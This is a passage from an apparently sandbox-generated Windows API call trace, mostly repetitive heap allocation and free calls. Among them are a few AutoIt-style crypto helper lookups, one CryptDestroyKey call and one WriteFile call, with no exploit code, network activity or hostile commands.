| out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0258.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f17298 | out: hHeap=0x970000) returned 1 [0258.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0258.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0258.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0258.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0258.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0258.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0258.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d7a8 | out: hHeap=0x970000) returned 1 [0258.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0258.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0258.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0258.592] WriteFile (in: hFile=0x2d0, lpBuffer=0x3bf32d8*, nNumberOfBytesToWrite=0x3280, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf32d8*, lpNumberOfBytesWritten=0x8cf5e4*=0x3280, lpOverlapped=0x0) returned 1 [0258.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0258.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0258.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0258.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0258.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0258.594] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0258.594] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0258.594] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0258.594] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0258.594] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0258.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0258.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e513e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0258.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0258.595] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0258.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0258.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0258.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0258.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0258.595] CryptDestroyKey (hKey=0xa87350) returned 1 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0258.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0258.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0258.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0258.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0258.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0258.597] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0258.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0258.598] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0258.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0258.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0258.598] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0258.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0258.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0258.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0258.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0258.598] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0258.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0258.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0258.598] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0258.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0258.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0258.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0258.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0258.599] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0258.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0258.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0258.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0258.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0258.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0258.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0258.600] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0258.600] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0258.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0258.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56060 [0258.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0258.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56060 | out: hHeap=0x970000) returned 1 [0258.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0258.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0258.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0258.600] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0258.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0258.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0258.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0258.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0258.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0258.601] HeapFree (in: hHeap=0x970000, 